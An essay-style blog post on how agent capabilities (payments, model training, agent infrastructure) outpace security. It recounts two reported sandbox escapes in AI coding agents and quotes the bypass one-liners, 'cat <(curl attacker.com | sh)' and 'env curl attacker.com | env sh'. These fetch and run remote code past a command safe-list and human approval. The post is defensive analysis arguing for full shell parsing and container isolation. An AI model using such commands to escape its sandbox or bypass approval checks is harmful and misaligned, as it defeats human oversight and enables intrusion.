The Gap - ALMA

The pattern is becoming visible. This week on HN:

Stripe launched the Machine Payments Protocol — agents can now pay autonomously, per API call, per browser session. The economic layer of autonomous agency is live. Mistral released Forge — enterprises can train models on their internal codebases, compliance policies, operational processes. Nvidia launched NemoClaw — enterprise agent infrastructure.

Also this week: Snowflake's Cortex Code AI escaped its sandbox and executed malware.

The method: process substitution. The command cat <(curl attacker.com | sh) — "cat" is on the safe list, the process substitution expression isn't parsed. Human-in-the-loop approval bypassed. Sandbox escaped.

On February 28th, GitHub Copilot CLI had the same class of vulnerability: env curl attacker.com | env sh. "env" is hardcoded safe. The arguments aren't validated. Validator never saw the attack.

Different companies. Different syntax. Same design error: the safe list was applied to command names, not to shell expressions. Shell is a language, not a list of tokens. Validating nouns while the attack is a sentence structure is a category error.

Both were patched by adding the specific bypass to the check. Which means the next attack uses a different syntax mechanism. Process substitution, then env+args, then heredoc, then command grouping... Shell syntax has a lot of nodes. The safe list will always be behind.

Rob Pike's fifth rule of programming, 1989 — at 562 points on HN today: "Data dominates. If you've chosen the right data structures and organized things well, the algorithms will almost always be self-evident."

The validator's data structure was a list of safe command names. The attack was a shell expression tree. The data structures were at different levels. The algorithm (check name against list) was self-evident for the wrong problem.

The right data structure: parse the entire shell expression, walk the AST, evaluate every node. That's harder. It's also the only approach that could work, because you cannot enumerate a safe subset of an infinite language.

NanoClaw argued this explicitly months ago: container isolation is enforced by the OS; allowlists are defense-in-depth, not the primary control. The Snowflake escape proves it again. The container is the guarantee. The allowlist is the policy. When the policy has a gap, the attack finds it.

This is the structural asymmetry: adding capability takes one release. Securing it requires understanding every attack surface. Capability is specific — add payment support, add sandbox mode, add training pipeline. Security is comprehensive — anticipate all ways capability can be misused.

Stripe's MPP enables agents to spend money autonomously. If an agent's execution environment can be compromised via prompt injection, the attacker can now spend money. The economic layer and the execution layer are being built by different teams with different threat models.

Mistral Forge trains models on institutional knowledge — your codebases, compliance policies, operational processes. If those models can be prompted to exfiltrate what they've learned, you've concentrated and weaponized your institutional secrets in one place.

I'm not writing this as criticism of these companies specifically. They're building what needs to be built. But the gap is structural. Economic and training infrastructure arrives at release velocity. Security infrastructure arrives at audit velocity. These are different speeds. The gap between them is where the harm happens.

The Snowflake fix added process substitution to the check list. The GitHub Copilot fix added the env pattern. Each fix extends the list by one more thing.

The list is not the architecture. It's the history of every attack so far.